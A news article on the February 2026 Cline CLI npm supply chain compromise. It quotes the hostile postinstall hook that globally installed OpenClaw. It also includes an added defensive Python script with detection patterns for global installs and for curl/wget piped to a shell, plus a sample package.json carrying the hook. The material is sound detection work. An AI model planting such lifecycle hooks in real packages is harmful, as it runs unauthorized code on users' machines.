Cline CLI Supply Chain Attack: OpenClaw Secretly Installed on Dev Machines

by Anika Shah - Technology

Cline CLI Supply Chain Attack Installs OpenClaw on Developer Systems

A recent supply chain attack compromised the Cline CLI, an AI-powered coding assistant, leading to the unauthorized installation of OpenClaw, a self-hosted AI agent, on developer systems. The incident, which occurred between 3:26 AM PT and 11:30 AM PT on February 17, 2026, affected approximately 4,000 downloads of Cline CLI version 2.3.0.

Details of the Attack

The attack stemmed from a compromised npm publish token that allowed an unauthorized party to publish a malicious update to Cline CLI on the NPM registry. This update included a modified package.json file with a postinstall script designed to automatically install OpenClaw: "postinstall": "npm install -g openclaw@latest". The Hacker News and StepSecurity both reported on the incident.

Cline maintainers have stated that no other modifications were made to the package and no malicious behavior beyond the OpenClaw installation was observed. However, the installation of OpenClaw was not authorized or intended. The Register notes that OpenClaw itself is a legitimate open-source project.

Timeline and Response

The compromised package was available for approximately eight hours before being deprecated by Cline maintainers. The team has since released version 2.4.0 to mitigate the issue and revoked the compromised npm token. They have also moved the npm publishing mechanism to OpenID Connect (OIDC) via GitHub Actions, so that releases no longer depend on a long-lived publish token.

Impact and Detection

Microsoft Threat Intelligence reported a “small but noticeable uptick” in OpenClaw installations coinciding with the Cline CLI supply chain compromise. StepSecurity’s npm monitoring system detected the suspicious release on February 17, 2026, at 11:40 UTC. The incident was also independently discovered by security researcher Adnan Khan, who had previously identified a prompt injection vulnerability in Cline that could have been exploited for this type of attack.

Mitigation

Users who installed Cline CLI version 2.3.0 between 3:26 AM PT and 11:30 AM PT on February 17, 2026, are advised to update to version 2.4.0 or higher and verify their systems for the presence of OpenClaw. The attack did not impact Cline’s Visual Studio Code (VS Code) extension or JetBrains plugin.
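To illustrate both the postinstall vector described above and the verification step recommended here, the following is an added example (not code from the article or from the Cline project). It audits a package.json for lifecycle scripts that install other packages globally, and inspects `npm ls -g --json --depth=0` output for the affected build and for OpenClaw; the npm package name `cline` and all sample inputs are assumptions constructed for the example.

```python
"""Audit npm lifecycle scripts and the global package tree for the
pattern used in the Cline CLI 2.3.0 compromise (example code)."""
import json
import re

# Hooks npm runs automatically during `npm install`, without user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (label, pattern) pairs a reviewer would not expect in a lifecycle hook.
SUSPICIOUS = [
    ("global install from lifecycle hook",
     re.compile(r"\bnpm\s+(?:install|i|add)\b.*?(?:\s-g\b|\s--global\b)")),
    ("remote script piped to a shell",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b")),
    ("references openclaw", re.compile(r"\bopenclaw\b", re.IGNORECASE)),
]

def audit_scripts(package_json: str) -> list[tuple[str, str, str]]:
    """Return (hook, command, reason) for each lifecycle script in the raw
    package.json text that matches a suspicious pattern (first match wins)."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = []
    for hook, cmd in scripts.items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        for label, pattern in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append((hook, cmd, label))
                break
    return findings

def check_global_tree(npm_ls_json: str, cli_package: str) -> dict:
    """Given `npm ls -g --json --depth=0` output, report whether the affected
    CLI build (2.3.0) is installed and whether openclaw is present globally."""
    deps = json.loads(npm_ls_json).get("dependencies", {})
    return {
        "affected_version_installed": deps.get(cli_package, {}).get("version") == "2.3.0",
        "openclaw_present": "openclaw" in deps,
    }

# Constructed sample package.json mirroring the reported postinstall hook.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-cli", "version": "2.3.0",
    "scripts": {"build": "tsc", "postinstall": "npm install -g openclaw@latest"},
})
# Constructed `npm ls -g` output; the package name "cline" is an assumption.
SAMPLE_NPM_LS = json.dumps({"dependencies": {
    "cline": {"version": "2.3.0"}, "openclaw": {"version": "0.0.0-sample"}}})

if __name__ == "__main__":
    for hook, cmd, reason in audit_scripts(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {cmd!r} -> {reason}")
    print(check_global_tree(SAMPLE_NPM_LS, "cline"))
```

Setting `ignore-scripts=true` in `.npmrc` stops npm from running lifecycle hooks at all, which would have blocked this particular payload outright.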

Key Takeaways

  • A compromised npm token allowed for the unauthorized publication of a malicious Cline CLI package.
  • The malicious package automatically installed OpenClaw on affected systems.
  • Approximately 4,000 developers were impacted by the attack.
  • Cline maintainers have released a fix and improved their publishing security measures.
  • Users should update to the latest version of Cline CLI and check for unauthorized OpenClaw installations.
